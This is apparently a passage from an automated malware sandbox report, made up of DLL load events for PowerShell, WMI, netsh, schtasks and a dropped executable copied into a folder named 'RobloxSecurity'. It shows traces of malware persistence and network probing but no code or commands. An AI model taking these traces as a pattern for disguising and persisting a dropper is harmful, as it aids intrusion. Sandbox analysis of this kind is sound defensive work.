                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: httpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: secur32.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: schannel.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: edputil.dll
                  Source: C:\Windows\System32\chcp.com | Section loaded: ulib.dll
                  Source: C:\Windows\System32\chcp.com | Section loaded: fsutilext.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: mprapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rasmontr.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rasapi32.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: mfc42u.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: authfwcfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: firewallapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: fwbase.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcmonitor.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dot3cfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dot3api.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: onex.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: eappcfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: ncrypt.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: eappprxy.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: ntasn1.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: fwcfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: hnetmon.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: netshell.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nlaapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: netsetupapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: netiohlp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: winnsi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nettrace.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nshhttp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: httpapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nshipsec.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: activeds.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: polstore.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: winipsec.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nshwfp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: cabinet.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: p2pnetsh.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: p2p.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rpcnsh.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wcnnetsh.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wlanapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: whhelper.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wlancfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wshelper.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wevtapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: mswsock.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wwancfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wwapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wcmapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rmclient.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: mobilenetworking.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: peerdistsh.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: slc.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: sppc.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: ktmw32.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: mprmsg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: version.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: httpapi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: rasman.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: secur32.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: schannel.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Section loaded: edputil.dll
                  Source: C:\Windows\System32\chcp.com | Section loaded: ulib.dll
                  Source: C:\Windows\System32\chcp.com | Section loaded: fsutilext.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: mprapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rasmontr.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rasapi32.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: mfc42u.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: authfwcfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: firewallapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: fwbase.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcmonitor.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dot3cfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dot3api.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: onex.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: eappcfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: ncrypt.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: eappprxy.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: ntasn1.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: fwcfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: hnetmon.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: netshell.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nlaapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: netsetupapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: netiohlp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: winnsi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nettrace.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nshhttp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: httpapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nshipsec.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: activeds.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: polstore.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: winipsec.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nshwfp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: cabinet.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: p2pnetsh.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: p2p.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rpcnsh.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wcnnetsh.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wlanapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: whhelper.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wlancfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wshelper.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wevtapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: mswsock.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wwancfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wwapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wcmapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rmclient.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: mobilenetworking.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: peerdistsh.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: slc.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: sppc.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: ktmw32.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: mprmsg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\chcp.com | Section loaded: ulib.dll
                  Source: C:\Windows\System32\chcp.com | Section loaded: fsutilext.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: mprapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rasmontr.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rasapi32.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: mfc42u.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: authfwcfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: firewallapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: fwbase.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcmonitor.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dot3cfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: dot3api.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: onex.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: eappcfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: ncrypt.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: eappprxy.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: ntasn1.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: fwcfg.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: hnetmon.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: netshell.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: nlaapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: netsetupapi.dll
                  Source: C:\Windows\System32\netsh.exe | Section loaded: netiohlp.dll
